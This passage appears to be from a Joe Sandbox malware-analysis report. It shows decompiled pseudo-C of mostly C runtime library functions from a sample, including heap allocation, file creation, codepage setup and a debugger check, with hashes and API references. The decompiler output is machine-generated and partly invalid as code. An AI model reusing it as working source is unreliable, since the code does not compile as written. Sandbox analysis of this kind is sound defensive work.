									_t59 = E004065F6(__eflags);
									 *_t59 = 0x16;
									goto L17;
								}
							} else {
								__eflags = _v8 - 1;
								_t96 = _v16;
								_t102 = _v20;
								if(_v8 != 1) {
									L13:
									_t76 =  *((intOrPtr*)(0x417158 + _t96 * 4));
									__eflags =  *((char*)(_t102 + _t76 + 0x28));
									if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
										L18:
										_t112 = _a4;
									} else {
										_t112 = _a4;
										_t77 = E00403BAE( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
										_t116 = _t116 + 0xc;
										_t108 = _t108 + _t77;
										asm("adc ebx, edx");
									}
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E00409DB0(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											goto L26;
										} else {
											_t74 = E00403DC5(_a4, _t95, _t98, _t108, _t86);
										}
									} else {
										L26:
										_t74 = _t108;
									}
								} else {
									_t78 =  *((intOrPtr*)(0x417158 + _t96 * 4));
									__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
									if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
										goto L13;
									} else {
										_t74 = E00403C2C(_t108, _t111, _a4, _t111, _v12);
									}
								}
							}
						} else {
							asm("cdq");
							_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
							asm("sbb ecx, edx");
						}
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
						} else {
							__eflags = _t111;
							if(_t111 < 0) {
								goto L17;
							} else {
								goto L7;
							}
						}
					}
					return _t74;
				} else {
					 *((intOrPtr*)(E004065F6(_t119))) = 0x16;
					return E00405C88() | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b903b1a8278af7aa4e6e5600d15a34813420a29582fd2a350d5dff79d8772b11
Instruction ID: b02cdb57053aba0594a8c2514fdadf61aee5174d9b96b8bf4b8544e1813a42c7
Opcode Fuzzy Hash: b903b1a8278af7aa4e6e5600d15a34813420a29582fd2a350d5dff79d8772b11
Instruction Fuzzy Hash: 5041F6B0A00108AFDB10DF58C880AAA7BB6AFC5364F24817EEA05BB3D2D779DD41C755

Uniqueness

Uniqueness Score: -1.00%

Function 004059E7 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004059E7(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t61;
				char _t67;
				signed char _t68;
				signed int _t69;
				signed int _t79;
				signed int _t80;
				char _t81;
				signed int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t58 =  *0x416010; // 0x34f38f42
				_v8 = _t58 ^ _t91;
				_t90 = _a4;
				if( *(_t90 + 4) == 0xfde9) {
					L19:
					_t80 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t81 = 0;
					do {
						_t46 = _t81 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t61 = _t80;
							} else {
								_t53 = _t90 + 0x19; // 0x405553
								 *(_t53 + _t81) =  *(_t53 + _t81) | 0x00000020;
								_t54 = _t81 - 0x20; // -32
								_t61 = _t54;
							}
						} else {
							 *(_t90 + _t81 + 0x19) =  *(_t90 + _t81 + 0x19) | 0x00000010;
							_t52 = _t81 + 0x20; // 0x20
							_t61 = _t52;
						}
						 *(_t90 + _t81 + 0x119) = _t61;
						_t81 = _t81 + 1;
						__eflags = _t81 - _t89;
					} while (_t81 < _t89);
					L26:
					return E00401C35(_t61, _t80, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t5 = _t90 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t80 = 0;
					_t89 = 0x100;
					_t67 = 0;
					do {
						 *((char*)(_t91 + _t67 - 0x104)) = _t67;
						_t67 = _t67 + 1;
					} while (_t67 < 0x100);
					_t68 = _v1814;
					_t84 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t68;
						if(_t68 == 0) {
							break;
						}
						_t88 =  *(_t84 + 1) & 0x000000ff;
						_t69 = _t68 & 0x000000ff;
						while(1) {
							__eflags = _t69 - _t88;
							if(_t69 > _t88) {
								break;
							}
							__eflags = _t69 - _t89;
							if(_t69 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t69 - 0x104)) = 0x20;
							_t69 = _t69 + 1;
							__eflags = _t69;
						}
						_t84 = _t84 + 2;
						__eflags = _t84;
						_t68 =  *_t84;
					}
					_t14 = _t90 + 4; // 0xe8458d00
					E00406D97(_t88, _t99, _t80, 1,  &_v264, _t89,  &_v1800,  *_t14, _t80);
					_t17 = _t90 + 4; // 0xe8458d00
					_t20 = _t90 + 0x21c; // 0xba0000
					E0040A1DF(_t99, _t80,  *_t20, _t89,  &_v264, _t89,  &_v520, _t89,  *_t17, _t80); // executed
					_t22 = _t90 + 4; // 0xe8458d00
					_t24 = _t90 + 0x21c; // 0xba0000
					E0040A1DF(_t99, _t80,  *_t24, 0x200,  &_v264, _t89,  &_v776, _t89,  *_t22, _t80);
					_t79 = _t80;
					do {
						_t85 =  *(_t91 + _t79 * 2 - 0x704) & 0x0000ffff;
						if((_t85 & 0x00000001) == 0) {
							__eflags = _t85 & 0x00000002;
							if((_t85 & 0x00000002) == 0) {
								_t86 = _t80;
							} else {
								 *(_t90 + _t79 + 0x19) =  *(_t90 + _t79 + 0x19) | 0x00000020;
								_t86 =  *((intOrPtr*)(_t91 + _t79 - 0x304));
							}
						} else {
							 *(_t90 + _t79 + 0x19) =  *(_t90 + _t79 + 0x19) | 0x00000010;
							_t86 =  *((intOrPtr*)(_t91 + _t79 - 0x204));
						}
						 *(_t90 + _t79 + 0x119) = _t86;
						_t79 = _t79 + 1;
					} while (_t79 < _t89);
					goto L26;
				}
			}

APIs

GetCPInfo.KERNEL32(E8458D00,?,0040A947,0040A93B,00000000), ref: 00405A19

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 1762c74ca0e4b913682eced4d42f5d94b0d05c8e5b57da8854a2ed7d5f839106
Instruction ID: 400883b989793238faa881b6cf2a91630d1b9d1c79db2402d677a61b36455f98
Opcode Fuzzy Hash: 1762c74ca0e4b913682eced4d42f5d94b0d05c8e5b57da8854a2ed7d5f839106
Instruction Fuzzy Hash: 0B41F87060464C9ADB218A54CC84BF77BF9EB45304F6404BEE586A7182D278BA45DF25

Uniqueness

Uniqueness Score: -1.00%

Function 004086DB Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004086DB(void* __ecx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				char _v12;
				void* _v20;
				intOrPtr _v24;
				char _v32;
				void* _t26;

				_pop(_t47);
				E0040887D(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L4:
					return 0;
				} else {
					_t26 = E0040BB7D( &_v12, _v0, _v24, _a8, 0x180); // executed
					if(_t26 != 0) {
						goto L4;
					} else {
						 *0x417394 =  *0x417394 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a12 + 8)) = 0;
						 *((intOrPtr*)(_a12 + 0x1c)) = 0;
						 *((intOrPtr*)(_a12 + 4)) = 0;
						 *_a12 = 0;
						 *((intOrPtr*)(_a12 + 0x10)) = _v12;
						return _a12;
					}
				}
			}

APIs

__wsopen_s.LIBCMT ref: 00408834

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: bbe3098154b44e24f8ef07967ef189509589ae7719c9e5bc8f15943e40f64c7f
Instruction ID: f3058be2510ef58ab18ffd39367909b0def47cbf9a42afcde85175ec133b20cc
Opcode Fuzzy Hash: bbe3098154b44e24f8ef07967ef189509589ae7719c9e5bc8f15943e40f64c7f
Instruction Fuzzy Hash: 3A114F7690410AAFCB05DF59E941D9B7BF4EF48304F14406AF809AB351DA34ED11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB4 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00404AB4(signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t14;
				signed int* _t20;
				signed int _t22;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				_Unknown_base(*)()* _t36;

				_t20 = 0x416f78 + _a4 * 4;
				_t28 =  *0x416010; // 0x34f38f42
				_t31 = _t30 | 0xffffffff;
				_t29 = _t28 ^  *_t20;
				_t22 = _t28 & 0x0000001f;
				asm("ror edx, cl");
				if(_t29 != _t31) {
					if(_t29 == 0) {
						_t11 = E004049ED(_t22, _a12, _a16); // executed
						if(_t11 == 0) {
							L7:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t31 ^  *0x416010;
							_t14 = 0;
							L8:
							return _t14;
						}
						_t36 = GetProcAddress(_t11, _a8);
						if(_t36 == 0) {
							goto L7;
						}
						 *_t20 = E004022F7(_t36);
						_t14 = _t36;
						goto L8;
					}
					return _t29;
				}
				return 0;
			}

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b86757478668675ae98b3905124ed1fd51d19a63a5f13f53f217cac3b47b87
Instruction ID: 325199db4a59cac74f9b1efa5e1aed84ca31ed36c6fee3017b434cf5dca11011
Opcode Fuzzy Hash: 89b86757478668675ae98b3905124ed1fd51d19a63a5f13f53f217cac3b47b87
Instruction Fuzzy Hash: E301F9B77001115FDB15CE6AEC40A9737A6BBC53247158136FA11EB1D4DB34D802DA88

Uniqueness

Uniqueness Score: -1.00%

Function 004083E1 Relevance: 1.6, APIs: 1, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004083E1(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E0040695A(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E004048D4(__eflags, _t4, 0xfa0, 0); // executed
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00405BB5(0);
				return _t35;
			}

APIs

Part of subcall function 0040695A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00404E28,00000001,00000364,00000005,000000FF,?,00407C5B,?,00000004,00000000,?,?), ref: 0040699B

_free.LIBCMT ref: 00408450

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 994fe78c4b8ea54ac6b2ada91a40809d863b34f685298993fca6dac3b4cddb82
Instruction ID: 57797b57e74558e6e7400518e33e6e6bfc81a6e9da3c02868b195b5ddb59b100
Opcode Fuzzy Hash: 994fe78c4b8ea54ac6b2ada91a40809d863b34f685298993fca6dac3b4cddb82
Instruction Fuzzy Hash: 130149B26003576BC721DF69C88199AFB98EB443B4F11063EE585B76C0EB746C15CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040695A Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040695A(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x417154, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0040349D();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E004065F6(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00405E78(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00404E28,00000001,00000364,00000005,000000FF,?,00407C5B,?,00000004,00000000,?,?), ref: 0040699B

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 70b6405e5ebb775fc93c99171bc780f1edbd6ba9bf33adcd02fe92a6aed6a904
Instruction ID: f06a366171da53cdbaec28c302755f86bbff63ae5dee198f7f4852c7355c1638
Opcode Fuzzy Hash: 70b6405e5ebb775fc93c99171bc780f1edbd6ba9bf33adcd02fe92a6aed6a904
Instruction Fuzzy Hash: F6F0B4B16041246BDF215F66DD06B6B379C9F41760F168037AC06BAAD0CA3CD92046ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040C494 Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E0040C494(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t24;

				 *0x417394 =  *0x417394 + 1;
				_t24 = _a4;
				_t11 = E004069B7(0x1000); // executed
				 *((intOrPtr*)(_t24 + 4)) = _t11;
				E00405BB5(0);
				if( *((intOrPtr*)(_t24 + 4)) == 0) {
					asm("lock or [eax], ecx");
					_t5 = _t24 + 0x14; // 0x40bdcb
					 *((intOrPtr*)(_t24 + 4)) = _t5;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t24 + 0x18)) = 0x1000;
				_t8 = _t24 + 4; // 0x8524c483
				_t15 =  *_t8;
				 *(_t24 + 8) =  *(_t24 + 8) & 0x00000000;
				 *_t24 = _t15;
				return _t15;
			}

APIs

Part of subcall function 004069B7: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0040B9FC,?,00000000,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D), ref: 004069E9

_free.LIBCMT ref: 0040C4B4

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 30ea1045e4792a0e76e6850c3985705f7b65e6bd33c69925ed7ebdd442a2e863
Instruction ID: e309847e7a27feb1f35353a2295d216bb98e89f72aa10d9439f55caf65929490
Opcode Fuzzy Hash: 30ea1045e4792a0e76e6850c3985705f7b65e6bd33c69925ed7ebdd442a2e863
Instruction Fuzzy Hash: 8DF062721057049FE3249F45D441752F7FCEF80711F10843FE29A9B9E1D6B4B4418B58

Uniqueness

Uniqueness Score: -1.00%

Function 004069B7 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004069B7(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E004065F6(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x417154, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0040349D();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00405E78(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0040B9FC,?,00000000,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D), ref: 004069E9

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9cd2b293b077574587b905ba5da465399fdc99a470a1b864e05d1ad3816befe6
Instruction ID: 696dda7507fdce524743ac4da572193aba961d08adb2abeda623d5712d6107d6
Opcode Fuzzy Hash: 9cd2b293b077574587b905ba5da465399fdc99a470a1b864e05d1ad3816befe6
Instruction Fuzzy Hash: BAE0E57220422566E62127669D09B9B3A4C8B523A0F03413BAC07B6AD0DA7CCC2051ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF88 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040BF88(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x0040bfa5
0x0040bfac

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,0040BC46,?,?,00000000), ref: 0040BFA5

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 124d094fe7c0ba865b100e04e826ad1cb4a7fe8c69d529bb9dcbbb0255295700
Instruction ID: 336ec5a2ecadef58ad1f08cdff2340f89a48fd4bb399667f2e12dd5f425b4386
Opcode Fuzzy Hash: 124d094fe7c0ba865b100e04e826ad1cb4a7fe8c69d529bb9dcbbb0255295700
Instruction Fuzzy Hash: 44D06C3200010DBBDF028F84DC06EDA3BAAFB88754F028150BA1856020C772E861AB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401846 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401846(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E004017EB(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00402060(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00402060(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E004017EB(_t49);
				}
				return _t49;
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401852
IsDebuggerPresent.KERNEL32 ref: 0040191E
SetUnhandledExceptionFilter.KERNEL32 ref: 0040193E
UnhandledExceptionFilter.KERNEL32(?), ref: 00401948

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 22ed9e3d5f1ad05360bad406297224c8d0f5709dcae853a40fed1a2fd8c385df
Instruction ID: 536895816315d71129c12b62b647cc8f3f8674ac1cab19154c642890ed1cf56c
Opcode Fuzzy Hash: 22ed9e3d5f1ad05360bad406297224c8d0f5709dcae853a40fed1a2fd8c385df
Instruction Fuzzy Hash: 523109B5D4121C9BDB10DFA5D9897CDBBF8BF08704F1040AAE409A7290EB755B85CF09

Uniqueness

Uniqueness Score: -1.00%

Function 00407014 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00407014(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x416708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00405BB5(_t46);
							E004066B3( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00405BB5(_t47);
							E004067B1( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00405BB5( *((intOrPtr*)(_t74 + 0x7c)));
						E00405BB5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00405BB5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00405BB5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00405BB5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00405BB5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004071AE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x416650) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00405BB5(_t31);
							E00405BB5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00405BB5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00405BB5(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 00407058

Part of subcall function 004066B3: _free.LIBCMT ref: 004066D0
